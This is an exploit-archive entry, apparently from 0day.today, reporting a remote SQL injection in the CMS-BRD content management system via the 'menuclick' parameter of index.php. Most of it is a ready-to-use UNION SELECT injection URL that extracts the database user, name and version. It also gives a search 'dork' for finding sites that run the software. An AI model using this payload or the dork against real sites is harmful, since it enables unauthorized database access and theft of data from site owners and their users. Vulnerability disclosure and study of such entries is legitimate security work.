id: 3224
date: 06/18/2008
title: CMS-BRD (menuclick) Remote SQL Injection Vulnerability
author: dun
cves: 

======================================================
CMS-BRD (menuclick) Remote SQL Injection Vulnerability
======================================================




  :::::::-.   ...    ::::::.    :::.
   ;;,   `';, ;;     ;;;`;;;;,  `;;;
   `[[     [[[['     [[[  [[[[[. '[[
    $$,    $$$$      $$$  $$$ "Y$c$$
    888_,o8P'88    .d888  888    Y88
    MMMMP"`   "YmmMMMM""  MMM     YM

   [ Discovered by dun ]

 ##########################################################
 #   [ CMS-BRD ]   Remote SQL Injection Vulnerability     #
 ##########################################################
 #
 # Script site: http://www.cms.brdconcept.fr/
 # 
 # Vuln: 
 # http://site.com/index.php?lang=en&menuclick=-1+UNION+SELECT+concat_ws(char(58),USER(),DATABASE(),VERSION())/*
 #
 # 
 # Dork example: "Powered By CMS-BRD"
 #
 ###############################################




#  0day.today [2023-03-22]  #